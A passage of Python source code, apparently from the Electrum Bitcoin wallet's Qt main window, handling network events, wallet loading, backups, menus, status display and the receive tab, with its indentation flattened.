on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = get_backup_dir(self.config)
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a bitcoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
